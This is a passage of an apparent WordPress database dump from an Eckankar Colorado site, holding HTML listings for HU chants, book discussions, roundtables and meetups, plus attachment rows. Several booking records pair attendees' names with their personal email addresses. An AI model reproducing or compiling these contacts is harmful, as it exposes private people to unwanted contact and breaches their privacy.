23:31:49','',0,'https://eckankar-colorado.org/nf_sub/266561/',0,'nf_sub','',0),(266563,2,'2022-04-14 09:09:20','2022-04-14 15:09:20','','grandma-family','','inherit','closed','closed','','grandma-family','','','2022-04-14 09:09:20','2022-04-14 15:09:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/04/grandma-family.jpg',0,'attachment','image/jpeg',0),(266567,15,'2022-04-18 17:03:55','2022-04-18 23:03:55','','HUSOS','','inherit','closed','closed','','husos','','','2022-04-18 17:03:55','2022-04-18 23:03:55','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/04/HUSOS.webp',0,'attachment','image/webp',0),(266568,15,'2022-04-19 07:59:04','2022-04-19 13:59:04','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you looking for help surrendering to the Divine?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you have difficulty trusting Spirit to have your best interest at heart?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">When faced with a challenge, do you often wonder when to let go and let God?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this ECK Light and Sound Service will help you see the balance between self-will and surrender and to learn to trust the blessings that come from spiritual surrender. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp writes in his book <em>Wisdom of the Heart, Book 3:</em></span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Yes, we surely must do all in our power to manage or solve the puzzles of health, relationships, and the like to the best of our ability. But when progress stops or even goes into reverse, mocking our abilities to fix them, the next step is to hand over the whole dish of spaghetti to Spirit. That is spiritual surrender.\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.<br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nTo get the Zoom login information, just fill out the form below. Hope to see you there!</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>The Art of Spiritual Surrender','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinethe-art-of-spiritual-surrender','','','2022-04-30 09:18:04','2022-04-30 15:18:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266568',0,'mec-events','',0),(266569,15,'2022-04-19 07:51:59','2022-04-19 13:51:59','','ELSS_SpirtualSurrender','','inherit','closed','closed','','elss_spirtualsurrender','','','2022-04-19 07:51:59','2022-04-19 13:51:59','',266568,'https://eckankar-colorado.org/wp-content/uploads/2022/04/ELSS_SpirtualSurrender.webp',0,'attachment','image/webp',0),(266572,0,'2022-04-19 13:54:11','2022-04-19 19:54:11','','','','publish','closed','closed','','266572','','','2022-04-19 13:54:11','2022-04-19 19:54:11','',0,'https://eckankar-colorado.org/nf_sub/266572/',0,'nf_sub','',0),(266573,2,'2022-04-22 21:14:31','2022-04-23 03:14:31','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\"></span><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - Online','','publish','closed','closed','','experience-hu-the-sound-of-soul-online','','','2022-04-22 21:18:46','2022-04-23 03:18:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266573',0,'mec-events','',0),(266575,2,'2022-04-23 10:13:19','2022-04-23 16:13:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are welcome. </span><span style=\"font-size: 14pt;\">Come and enjoy spending time with like-minded people.<br>\r\n</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'Spiritual Surrender and Free Will\'','','publish','closed','closed','','roundtable-discussion-in-personspiritual-surrender-and-free-will','','','2022-04-23 10:16:44','2022-04-23 16:16:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266575',0,'mec-events','',0),(266576,2,'2022-04-23 10:36:36','2022-04-23 16:36:36','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are welcome. </span><span style=\"font-size: 14pt;\">Come and enjoy spending time with like-minded people.<br>\r\n</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'Karma: God’s Love in Action\'','','publish','closed','closed','','roundtable-discussion-in-personkarma-gods-love-in-action','','','2022-04-23 10:37:52','2022-04-23 16:37:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266576',0,'mec-events','',0),(266577,2,'2022-04-23 10:36:05','2022-04-23 16:36:05','','karma-1','','inherit','closed','closed','','karma-1','','','2022-04-23 10:36:05','2022-04-23 16:36:05','',266576,'https://eckankar-colorado.org/wp-content/uploads/2022/04/karma-1.jpg',0,'attachment','image/jpeg',0),(266586,0,'2022-04-26 14:35:17','2022-04-26 20:35:17','','','','publish','closed','closed','','266586','','','2022-04-26 14:35:17','2022-04-26 20:35:17','',0,'https://eckankar-colorado.org/nf_sub/266586/',0,'nf_sub','',0),(266589,0,'2022-04-26 16:12:49','2022-04-26 22:12:49','','','','publish','closed','closed','','266589','','','2022-04-26 16:12:49','2022-04-26 22:12:49','',0,'https://eckankar-colorado.org/nf_sub/266589/',0,'nf_sub','',0),(266590,0,'2022-04-28 08:28:02','2022-04-28 14:28:02','','','','publish','closed','closed','','266590','','','2022-04-28 08:28:02','2022-04-28 14:28:02','',0,'https://eckankar-colorado.org/nf_sub/266590/',0,'nf_sub','',0),(266597,15,'2022-04-28 18:01:45','2022-04-29 00:01:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. </span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU is an ancient name for God, a sacred sound, and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this IN-PERSON event in Pagosa Springs, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion group, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul <br>In Person - Pagosa Springs','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-pagosa-springs','','','2022-04-28 18:01:45','2022-04-29 00:01:45','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266597',0,'mec-events','',0),(266598,15,'2022-04-28 17:58:49','2022-04-28 23:58:49','','HUSoS2','','inherit','closed','closed','','husos2','','','2022-04-28 17:58:49','2022-04-28 23:58:49','',266597,'https://eckankar-colorado.org/wp-content/uploads/2022/04/HUSoS2.webp',0,'attachment','image/webp',0),(266604,2,'2022-04-30 17:16:18','2022-04-30 23:16:18','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p class=\"\" style=\"font-size: 14px;\"><span style=\"font-size: 14pt;\">Would you like to have personal experience with spiritual masters? Join us as we discuss this book by Sri Harold Klemp that welcomes you to the world of ECK Masters. The stories and insights in these pages can help you to recognize the presence, divine love, and guidance of these wonderful Co-workers with God. This book features profiles of eleven ECK Masters along with their portraits and spiritual exercises designed to help you meet them.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This discussion will take place every 3rd Sunday Online via Zoom and will run from May 2022 to April 2023.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The book is available at <a href=\"https://eckankar-colorado.bmetrack.com/c/l?u=DC3EFAA&amp;e=1442BF5&amp;c=86639&amp;t=0&amp;l=2D3AFE3B&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=1\" target=\"_blank\" rel=\"noopener\">EckBooks</a>, and through many online bookstores like <a href=\"https://www.amazon.com/Those-Wonderful-Masters-Harold-Klemp/dp/1570432171\" target=\"_blank\" rel=\"noopener\">Amazon</a>.<br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">For login information, please register below.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Book Discussion - Online<br>\'Those Wonderful ECK Masters\'','','publish','closed','closed','','book-discussion-onlinethose-wonderful-eck-masters','','','2023-01-07 13:56:30','2023-01-07 20:56:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266604',0,'mec-events','',0),(266605,2,'2022-04-30 17:15:39','2022-04-30 23:15:39','','those-wonderful-eck-masters-lscape-1','','inherit','closed','closed','','those-wonderful-eck-masters-lscape-1','','','2022-04-30 17:15:39','2022-04-30 23:15:39','',266604,'https://eckankar-colorado.org/wp-content/uploads/2022/04/those-wonderful-eck-masters-lscape-1.jpg',0,'attachment','image/jpeg',0),(266607,1000000,'2022-05-01 10:30:00','2022-05-01 16:30:00','','Shauncie - teamskidmore@gmail.com','','publish','closed','closed','','shauncie-teamskidmoregmail-com','','','2022-05-01 10:30:00','2022-05-01 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266607',0,'mec-books','',0),(266608,1000001,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Kelly Walker  - kellywinfo@gmail.com','','publish','closed','closed','','kelly-walker-kellywinfogmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266608',0,'mec-books','',0),(266609,0,'2022-05-01 07:38:09','2022-05-01 13:38:09','','','','publish','closed','closed','','266609','','','2022-05-01 07:38:09','2022-05-01 13:38:09','',0,'https://eckankar-colorado.org/nf_sub/266609/',0,'nf_sub','',0),(266610,1000002,'2022-05-01 10:30:00','2022-05-01 16:30:00','','Andre  - mugarugaandrew@gmail.com','','publish','closed','closed','','andre-mugarugaandrewgmail-com','','','2022-05-01 10:30:00','2022-05-01 16:30:00','',0,'https://eckankar-colorado.org/mec-books/andre-mugarugaandrewgmail-com/',0,'mec-books','',0),(266611,2,'2022-05-01 13:13:17','2022-05-01 19:13:17','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">In Person at the ECK Temple of Utah and Online via Zoom</span></strong></p>\r\n<p class=\"\"><em><span style=\"font-size: 14pt;\">This event will be held every 3rd Tuesday and run from May 2022 through September 2022.</span></em></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Released at the 2021 ECKANKAR Soul Adventure Seminar, this book is the 4th and latest in the <em>Wisdom of the Heart</em> series by Sri Harold Klemp. Each story contained in this book is taken from “<em>Wisdom Notes</em>” in <em>The Mystic World</em> over the years. It may be quite interesting to compare our current understanding of these writings to when we initially read them in years past.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase the book at your local ECK Center, or order from the <a href=\"https://www.eckbooks.org/items/-2290-8.html?\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.<br>\r\n</span><span style=\"font-size: 14pt;\"></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #23507d;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nTo get the Zoom login information, just fill out the form below.</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Book Discussion - Online & In Person<br>\'Wisdom of the Heart, Book 4\'','','publish','closed','closed','','online-book-discussionwisdom-of-the-heart-book-4','','','2022-05-24 14:26:48','2022-05-24 20:26:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266611',0,'mec-events','',0),(266612,2,'2022-05-01 12:59:09','2022-05-01 18:59:09','','wisdom-of-the-heart-lscape-1','','inherit','closed','closed','','wisdom-of-the-heart-lscape-1','','','2022-05-01 12:59:09','2022-05-01 18:59:09','',266611,'https://eckankar-colorado.org/wp-content/uploads/2022/05/wisdom-of-the-heart-lscape-1.jpg',0,'attachment','image/jpeg',0),(266619,2,'2022-05-02 12:42:33','2022-05-02 18:42:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>– This Discussion Is Available To Members Of Eckankar Who Are 2nd Initiates Or Above –</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt; color: #1d5791;\"><strong>Utah ECK Temple and Zoom</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><em>These events will take place on the 2nd Sunday and run from <strong>June to October 2022.</strong></em></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to join the book discussion on Sri Harold Klemp’s <em>Way of the Initiate</em>. The book is a short and sweet guide on how to succeed in your study of ECK and how to live ECK so you may act as a vehicle for the Holy Spirit. Each discussion will focus on two chapters from the text and you are welcome to join in-person at the Utah ECK Temple or via Zoom. <br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This book was mailed to all chelas who are 2nd Initiates or above.</span></p>\r\n<p class=\"\"><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">For those who cannot attend in person, you are welcome to attend online.<br>\r\nSee the \'Chela\' Newsletter for log in information.<br>\r\n</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Book Discussion - Online & In Person<br>\'Way of the Initiate\'','','publish','closed','closed','','book-discussion-online-in-personway-of-the-initiate','','','2022-11-03 20:42:13','2022-11-04 02:42:13','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266619',0,'mec-events','',0),(266621,1000003,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Sue Haebig - sue2earth@msn.com','','publish','closed','closed','','sue-haebig-sue2earthmsn-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266621',0,'mec-books','',0),(266624,2,'2022-05-02 14:13:27','2022-05-02 20:13:27','','way-of-the-initiate-3','','inherit','closed','closed','','way-of-the-initiate-3','','','2022-05-02 14:13:27','2022-05-02 20:13:27','',266619,'https://eckankar-colorado.org/wp-content/uploads/2022/05/way-of-the-initiate-3.jpg',0,'attachment','image/jpeg',0),(266625,2,'2023-08-27 11:22:38','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>-– This Discussion Is Available To Members Of Eckankar Who Are 2nd Initiates Or Above –</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt; color: #1d5791;\"><strong>Utah ECK Temple and Zoom</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><em>These events will take place on the 2nd Sunday and run from <strong>June to October 2022.</strong></em></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to join the book discussion on Sri Harold Klemp’s <em>Way of the Initiate</em>. The book is a short and sweet guide on how to succeed in your study of ECK and how to live ECK so you may act as a vehicle for the Holy Spirit. Each discussion will focus on two chapters from the text and you are welcome to join in-person at the Utah ECK Temple or via Zoom. <br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This book was mailed to all chelas who are 2nd Initiates or above.</span></p>\r\n<p class=\"\"><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">For those who cannot attend in person, you are welcome to attend online.<br>\r\nSee the \'Chela\' Newsletter for log in information.<br>\r\n</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>','BOOK DISCUSSION TEMPLATE FOR MEMBERS ONLY EVENTS |Title Goes Here','','draft','closed','closed','','','','','2023-08-27 11:22:38','2023-08-27 17:22:38','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266625',0,'mec-events','',0),(266626,2,'2022-05-02 14:39:38','2022-05-02 20:39:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div><span class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;-- This event is for chelas who have completed \'Arahata Training\' --</span></strong><br>\r\n</span></div>\r\n<div><span class=\"\"><strong>&nbsp;</strong></span></div>\r\n<div>\r\n<p class=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Greetings Arahatas!</span></strong></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-left-width: 4px; border-color: #086eac;\">\r\n<p><span style=\"font-size: 14pt;\">\"<em>You are the ECK Arahata. You want to tower above the disciplines of </em><em>matter, emotions and mind. Your standing as a teacher in ECK is based upon the Mahanta, the Living ECK Master. As a student of life, you simply present the teachings of ECK to those who want them.</em>\"&nbsp;&nbsp; <span style=\"font-size: 12pt;\">—Sri Harold Klemp, ECK Arahata Book (2015 edition), pp. 42-43</span></span></p>\r\n</blockquote>\r\n<span class=\"\" style=\"font-size: 14pt;\">You’re cordially invited to attend one or more Arahata Circles to both refresh and refine your skills as well as to connect and share with the community of ECK Arahatas. In addition to Satsang classes, book studies, Meetups and ECK events, arahata skills are daily life skills that help lead seekers to ECK. Attendance at a yearly Arahata Circle is recommended but not required for all chelas who have completed Arahata Training. </span></div>\r\n<div></div>\r\n<div><span class=\"\" style=\"color: #23507d;\"><strong><span class=\"\" style=\"font-size: 16pt;\">See the current Colorado ‘Chela’ Newsletter for login information.</span></strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Statewide Arahata Circle - Online','','publish','closed','closed','','statewide-arahata-circle-onlinetitle-goes-here-template','','','2022-08-24 10:54:48','2022-08-24 16:54:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266626',0,'mec-events','',0),(266627,2,'2022-05-02 14:37:50','2022-05-02 20:37:50','','arahata-circle-1','','inherit','closed','closed','','arahata-circle-1','','','2022-05-02 14:37:50','2022-05-02 20:37:50','',266626,'https://eckankar-colorado.org/wp-content/uploads/2022/05/arahata-circle-1.jpg',0,'attachment','image/jpeg',0),(266631,0,'2022-05-02 15:51:52','2022-05-02 21:51:52','','','','publish','closed','closed','','266631','','','2022-05-02 15:51:52','2022-05-02 21:51:52','',0,'https://eckankar-colorado.org/nf_sub/266631/',0,'nf_sub','',0),(266632,0,'2022-05-02 20:47:07','2022-05-03 02:47:07','','','','publish','closed','closed','','266632','','','2022-05-02 20:47:07','2022-05-03 02:47:07','',0,'https://eckankar-colorado.org/nf_sub/266632/',0,'nf_sub','',0),(266633,15,'2022-05-03 07:29:15','2022-05-03 13:29:15','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Wisdom finds the open heart.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“The ECK, or Holy Spirit, uses any number of ways to bring you answers or insights about the right thing to do. It brings confirmation into your life in times of doubt.”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">--Harold Klemp, <em>The Awakened Heart</em>, p. 29</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">When we open our hearts to love, we can gain new perspectives and acquire wisdom that can help us face life’s challenges.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Souls of every spiritual belief are invited to join in this open conversation centering around love, wisdom, and daily life. Come and share your experiences, ideas, ask a related question, or just listen.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will also be sharing a technique for going deeper into your own heart wisdom.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/285655034/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Jewels of Wisdom in Everyday Life\'','','publish','closed','closed','','meetup-onlinejewels-of-wisdom-in-everyday-life','','','2022-05-03 07:31:57','2022-05-03 13:31:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266633',0,'mec-events','',0),(266634,15,'2022-05-03 07:26:53','2022-05-03 13:26:53','','JewelsOfWisdom','','inherit','closed','closed','','jewelsofwisdom','','','2022-05-03 07:26:53','2022-05-03 13:26:53','',266633,'https://eckankar-colorado.org/wp-content/uploads/2022/05/JewelsOfWisdom.webp',0,'attachment','image/webp',0),(266644,1000004,'2022-05-08 10:30:00','2022-05-08 16:30:00','','David - class1coldwell@gmail.com','','publish','closed','closed','','david-class1coldwellgmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266644',0,'mec-books','',0),(266654,1000005,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Jacqueline Diane Roberts  - jackiediane1109@gmail.com','','publish','closed','closed','','jacqueline-diane-roberts-jackiediane1109gmail-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266654',0,'mec-books','',0),(266655,1000006,'2022-05-08 10:30:00','2022-05-08 16:30:00','','Dave Ogletree - dogle007@yahoo.com','','publish','closed','closed','','dave-ogletree-dogle007yahoo-com','','','2022-05-08 10:30:00','2022-05-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266655',0,'mec-books','',0),(266657,15,'2022-05-08 08:31:39','2022-05-08 14:31:39','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to find freedom from karma and your limiting beliefs and attitudes?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you wonder why you keep repeating the same mistakes?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you be interested in spiritual techniques that help you resolve your karma easily?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly welcomed to this spiritual discussion. We will be exploring techniques you can use to rise above the karmic conditions you find yourself in and see the hand of the Divine in your daily life. You can become the “cause” in your own life and not be at the “effect” of your past. Our goal is that each participant will learn new ways to resolve their own karma so that they can live each day more fully and experience a greater measure of God’s 